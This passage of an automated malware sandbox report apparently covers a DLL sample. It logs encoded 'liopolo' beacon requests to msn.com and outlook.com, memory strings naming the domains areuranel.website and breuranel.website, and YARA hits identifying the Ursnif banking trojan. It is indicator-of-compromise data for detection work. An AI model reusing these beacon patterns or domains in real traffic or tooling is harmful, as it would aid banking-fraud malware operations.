                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/Y72qNipk37Ef6u/yMdIBjS0TF0zySEk6QqaV/RM1KEI93T2ySqpPS/3a9271HiYU26bKL/CuRYvP0IHiJcR1Om5j/v_2BngoS3/PTV0r6xFeitoJIhrqq8c/AEX9VsNnHNbr2POb3_2/FNC3movbIQSikKNXB2GV0p/4fgFX9c16BwP9/WREoUF91/5ZKv3_2F1kKAcsEj_2FjVau/em3Y7wQlz5/TIVYBPW_2/FO9688N.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNsX_2FadD/dwubn6X7zOguR/iMUlQrL6/BThA9h9Clk92iCx0cavsxkl/4fdI4nS6Sj/yihCHX4r_2Bf1xsG_/2BUKQzRucv09/S5UJEFULHgR/sYI2tOST5SUskI/G4qeFHRMNjcHJ2CVjy9gn/wxByXeY0/co.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNsX_2FadD/dwubn6X7zOguR/iMUlQrL6/BThA9h9Clk92iCx0cavsxkl/4fdI4nS6Sj/yihCHX4r_2Bf1xsG_/2BUKQzRucv09/S5UJEFULHgR/sYI2tOST5SUskI/G4qeFHRMNjcHJ2CVjy9gn/wxByXeY0/co.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNsX_2FadD/dwubn6X7zOguR/iMUlQrL6/BThA9h9Clk92iCx0cavsxkl/4fdI4nS6Sj/yihCHX4r_2Bf1xsG_/2BUKQzRucv09/S5UJEFULHgR/sYI2tOST5SUskI/G4qeFHRMNjcHJ2CVjy9gn/wxByXeY0/co.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/wJxSKqxKoIs4hl6/RPgHanWG_2BhdmCUvh/kPMaptHHD/74uKkWxVzwFhyaQkkp7I/NkZBZMfOWiOvGyR07Yg/UdsHK_2BhDWC9S_2Bq5qwQ/tic9OPnwrqPJ8/sBs9ep3g/eQ_2FbCMldJx8QkchMeY_2F/9VT2Y68DG0/T_2Fo8PaFlf7e2wiH/yMWBWkxn2yOC/D8kmhJaVYSvP5/Yp7bf.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/wJxSKqxKoIs4hl6/RPgHanWG_2BhdmCUvh/kPMaptHHD/74uKkWxVzwFhyaQkkp7I/NkZBZMfOWiOvGyR07Yg/UdsHK_2BhDWC9S_2Bq5qwQ/tic9OPnwrqPJ8/sBs9ep3g/eQ_2FbCMldJx8QkchMeY_2F/9VT2Y68DG0/T_2Fo8PaFlf7e2wiH/yMWBWkxn2yOC/D8kmhJaVYSvP5/Yp7bf.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/wJxSKqxKoIs4hl6/RPgHanWG_2BhdmCUvh/kPMaptHHD/74uKkWxVzwFhyaQkkp7I/NkZBZMfOWiOvGyR07Yg/UdsHK_2BhDWC9S_2Bq5qwQ/tic9OPnwrqPJ8/sBs9ep3g/eQ_2FbCMldJx8QkchMeY_2F/9VT2Y68DG0/T_2Fo8PaFlf7e2wiH/yMWBWkxn2yOC/D8kmhJaVYSvP5/Yp7bf.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 5c2fdc38-15df-1f17-392b-827de99c6af9Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: VI1PR0101CU002.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: VI1PR0101CA0050.EURPRD01.PROD.EXCHANGELABS.COMX-CalculatedBETarget: VI1PR06MB6510.eurprd06.prod.outlook.comX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: ONwvXN8VFx85K4J96Zxq+Q.1.1X-FEServer: VI1PR0101CA0050X-Powered-By: ASP.NETX-FEServer: AS9PR06CA0070Date: Mon, 11 Oct 2021 20:36:17 GMTConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 8895e295-2c4a-97c0-6a4c-33e5a4e5782aStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: VI1PR08CU014.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: VI1PR08CA0260.EURPRD08.PROD.OUTLOOK.COMX-CalculatedBETarget: VI1PR0401MB2509.EURPRD04.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: leKViEoswJdqTDPlpOV4Kg.1.1X-FEServer: VI1PR08CA0260X-Powered-By: ASP.NETX-FEServer: AM7PR04CA0027Date: Mon, 11 Oct 2021 20:36:19 GMTConnection: close
                      Source: loaddll32.exe, 00000000.00000002.747869464.0000000000E32000.00000004.00000020.sdmp, WerFault.exe, 0000000E.00000002.610520659.00000000044A0000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000002.629217988.0000000005231000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.633258942.0000000004590000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: loaddll32.exe, 00000000.00000003.597703077.0000000003459000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.597601691.0000000000E65000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.747507339.0000000000DF1000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.599440417.0000000005299000.00000004.00000040.sdmpString found in binary or memory: http://ogp.me/ns#
                      Source: loaddll32.exe, 00000000.00000003.597703077.0000000003459000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.597601691.0000000000E65000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.747507339.0000000000DF1000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.599440417.0000000005299000.00000004.00000040.sdmpString found in binary or memory: http://ogp.me/ns/fb#
                      Source: loaddll32.exe, 00000000.00000002.747869464.0000000000E32000.00000004.00000020.sdmpString found in binary or memory: https://areuranel.website/
                      Source: loaddll32.exe, 00000000.00000002.747507339.0000000000DF1000.00000004.00000020.sdmpString found in binary or memory: https://areuranel.website/liopolo/rWpAIhmksB/fMLnE1PXrqd2VqbBj/OJg6ENFLsvoK/2bIbYQZt6Yx/_2FaLr_2FAyB
                      Source: loaddll32.exe, 00000000.00000003.597703077.0000000003459000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.598864684.0000000005318000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.599253320.000000000531D000.00000004.00000040.sdmpString found in binary or memory: https://blogs.msn.com/
                      Source: loaddll32.exe, 00000000.00000002.747507339.0000000000DF1000.00000004.00000020.sdmpString found in binary or memory: https://breuranel.website/liopolo/gMrPChFga/JRICWiSmidyxIDHRRF29/nBc8QVOwWK1fs_2BdoE/a_2FMpJCzeZdSQf
                      Source: loaddll32.exe, 00000000.00000003.628949223.0000000000DF3000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.599602705.000000000531B000.00000004.00000040.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                      Source: loaddll32.exe, 00000000.00000003.597703077.0000000003459000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.628949223.0000000000DF3000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.597397384.0000000000E66000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;checkda=1&amp;ct=1633984536&amp;rver
                      Source: rundll32.exe, 00000003.00000003.599440417.0000000005299000.00000004.00000040.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;checkda=1&amp;ct=1633984537&amp;rver
                      Source: loaddll32.exe, 00000000.00000003.597703077.0000000003459000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.597397384.0000000000E66000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.599440417.0000000005299000.00000004.00000040.sdmpString found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&amp;market=en-us&quot;
                      Source: loaddll32.exe, 00000000.00000003.628949223.0000000000DF3000.00000004.00000001.sdmpString found in binary or memory: https://msn.com/
                      Source: loaddll32.exe, 00000000.00000003.628949223.0000000000DF3000.00000004.00000001.sdmpString found in binary or memory: https://msn.com/#
                      Source: loaddll32.exe, 00000000.00000002.747507339.0000000000DF1000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000003.696404681.0000000000DF1000.00000004.00000001.sdmpString found in binary or memory: https://outlook.com/signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNsX_2FadD/d
                      Source: loaddll32.exe, 00000000.00000002.747507339.0000000000DF1000.00000004.00000020.sdmpString found in binary or memory: https://outlook.office365.com/
                      Source: loaddll32.exe, 00000000.00000002.747507339.0000000000DF1000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000003.696404681.0000000000DF1000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cN
                      Source: loaddll32.exe, 00000000.00000003.597703077.0000000003459000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.628949223.0000000000DF3000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.597397384.0000000000E66000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.599440417.0000000005299000.00000004.00000040.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/en-us//api/modules/cdnfetch&quot;
                      Source: loaddll32.exe, 00000000.00000003.597703077.0000000003459000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.599440417.0000000005299000.00000004.00000040.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/en-us/homepage/_sc/css/d7cb56b9-3a82770e/direct
                      Source: loaddll32.exe, 00000000.00000003.597703077.0000000003459000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.599440417.0000000005299000.00000004.00000040.sdmpString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;a
                      Source: loaddll32.exe, 00000000.00000003.628949223.0000000000DF3000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/
                      Source: loaddll32.exe, 00000000.00000003.628949223.0000000000DF3000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/.
                      Source: rundll32.exe, 00000003.00000003.599440417.0000000005299000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fY72qNipk37Ef6u%2fyMdIBjS0TF0zySEk6QqaV%2fRM1KEI93T2y
                      Source: loaddll32.exe, 00000000.00000003.597703077.0000000003459000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fg1XXBsAxpar6N9kYzRnrf3%2fOQX2uNrM13y9W%2fOb_2BksA%2f
                      Source: loaddll32.exe, 00000000.00000003.597703077.0000000003459000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.628949223.0000000000DF3000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.597397384.0000000000E66000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.599440417.0000000005299000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/en-us//api/modules/fetch&quot;
                      Source: loaddll32.exe, 00000000.00000003.597522417.0000000000E5D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.628949223.0000000000DF3000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/mail/liopolo/g1XXBsAxpar6N9kYzRnrf3/OQX2uNrM13y9W/Ob_2BksA/x8bQpkLjYsruIhPFJi3ZE
                      Source: loaddll32.exe, 00000000.00000003.628949223.0000000000DF3000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com:443/mail/liopolo/g1XXBsAxpar6N9kYzRnrf3/OQX2uNrM13y9W/Ob_2BksA/x8bQpkLjYsruIhPFJ
                      Source: loaddll32.exe, 00000000.00000002.747507339.0000000000DF1000.00000004.00000020.sdmpString found in binary or memory: https://www.outlook.com
                      Source: loaddll32.exe, 00000000.00000003.696404681.0000000000DF1000.00000004.00000001.sdmpString found in binary or memory: https://www.outlook.com/signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNsX_2Fa
                      Source: unknownDNS traffic detected: queries for: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/g1XXBsAxpar6N9kYzRnrf3/OQX2uNrM13y9W/Ob_2BksA/x8bQpkLjYsruIhPFJi3ZErA/tgPZIh6fnf/T9Sy6miArqkO107Ts/8FGy1p_2BKcs/IbQATX6Vpot/p9H1S_2FBpU5gj/XH9RZi7pSy90EfKCN0xoX/QAyaPWXD19YFLug2/I6ErSp8Uq8hZ5g3/WwbSra7jr8/n3VI4u.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/Y72qNipk37Ef6u/yMdIBjS0TF0zySEk6QqaV/RM1KEI93T2ySqpPS/3a9271HiYU26bKL/CuRYvP0IHiJcR1Om5j/v_2BngoS3/PTV0r6xFeitoJIhrqq8c/AEX9VsNnHNbr2POb3_2/FNC3movbIQSikKNXB2GV0p/4fgFX9c16BwP9/WREoUF91/5ZKv3_2F1kKAcsEj_2FjVau/em3Y7wQlz5/TIVYBPW_2/FO9688N.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNsX_2FadD/dwubn6X7zOguR/iMUlQrL6/BThA9h9Clk92iCx0cavsxkl/4fdI4nS6Sj/yihCHX4r_2Bf1xsG_/2BUKQzRucv09/S5UJEFULHgR/sYI2tOST5SUskI/G4qeFHRMNjcHJ2CVjy9gn/wxByXeY0/co.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNsX_2FadD/dwubn6X7zOguR/iMUlQrL6/BThA9h9Clk92iCx0cavsxkl/4fdI4nS6Sj/yihCHX4r_2Bf1xsG_/2BUKQzRucv09/S5UJEFULHgR/sYI2tOST5SUskI/G4qeFHRMNjcHJ2CVjy9gn/wxByXeY0/co.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNsX_2FadD/dwubn6X7zOguR/iMUlQrL6/BThA9h9Clk92iCx0cavsxkl/4fdI4nS6Sj/yihCHX4r_2Bf1xsG_/2BUKQzRucv09/S5UJEFULHgR/sYI2tOST5SUskI/G4qeFHRMNjcHJ2CVjy9gn/wxByXeY0/co.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/wJxSKqxKoIs4hl6/RPgHanWG_2BhdmCUvh/kPMaptHHD/74uKkWxVzwFhyaQkkp7I/NkZBZMfOWiOvGyR07Yg/UdsHK_2BhDWC9S_2Bq5qwQ/tic9OPnwrqPJ8/sBs9ep3g/eQ_2FbCMldJx8QkchMeY_2F/9VT2Y68DG0/T_2Fo8PaFlf7e2wiH/yMWBWkxn2yOC/D8kmhJaVYSvP5/Yp7bf.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/wJxSKqxKoIs4hl6/RPgHanWG_2BhdmCUvh/kPMaptHHD/74uKkWxVzwFhyaQkkp7I/NkZBZMfOWiOvGyR07Yg/UdsHK_2BhDWC9S_2Bq5qwQ/tic9OPnwrqPJ8/sBs9ep3g/eQ_2FbCMldJx8QkchMeY_2F/9VT2Y68DG0/T_2Fo8PaFlf7e2wiH/yMWBWkxn2yOC/D8kmhJaVYSvP5/Yp7bf.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/wJxSKqxKoIs4hl6/RPgHanWG_2BhdmCUvh/kPMaptHHD/74uKkWxVzwFhyaQkkp7I/NkZBZMfOWiOvGyR07Yg/UdsHK_2BhDWC9S_2Bq5qwQ/tic9OPnwrqPJ8/sBs9ep3g/eQ_2FbCMldJx8QkchMeY_2F/9VT2Y68DG0/T_2Fo8PaFlf7e2wiH/yMWBWkxn2yOC/D8kmhJaVYSvP5/Yp7bf.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.6:49761 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.6:49763 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.6:49777 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.199.194:443 -> 192.168.2.6:49778 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.208.66:443 -> 192.168.2.6:49779 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.6:49780 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.178.34:443 -> 192.168.2.6:49781 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.178.98:443 -> 192.168.2.6:49782 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000003.00000003.598864684.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.596720166.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.597214572.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.597886088.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.689258244.000000000509D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.598927334.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.642989614.000000000519B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.597021606.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.596902134.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.598779799.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.686530956.000000000325D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.641044169.000000000335B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.729588115.000000000315F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.597111833.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.599125921.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.596646171.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.598981939.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.599214026.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.599055381.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.599169417.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.597301011.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.733741499.0000000004F9F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.596793912.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.599525991.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 3272, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5692, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6f030000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.6f030000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2d094a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6f030000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4c394a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.e9a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.6f030000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.322a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.e9a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.322a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4c394a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2d2a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2d094a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.d50000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.6f030000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2e1a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2d2a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2e2a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2e2a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2e1a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3030000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.536008305.0000000002D20000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.513458257.0000000003220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.492494632.0000000002E20000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.752028518.0000000004C39000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.492791250.0000000002E10000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.540888918.0000000000E90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.749793100.0000000002D09000.00000004.00000040.sdmp, type: MEMORY

                      E-Banking Fraud:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000003.00000003.598864684.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.596720166.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.597214572.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.597886088.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.689258244.000000000509D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.598927334.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.642989614.000000000519B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.597021606.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.596902134.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.598779799.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.686530956.000000000325D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.641044169.000000000335B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.729588115.000000000315F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.597111833.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.599125921.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.596646171.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.598981939.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.599214026.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.599055381.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.599169417.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.597301011.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
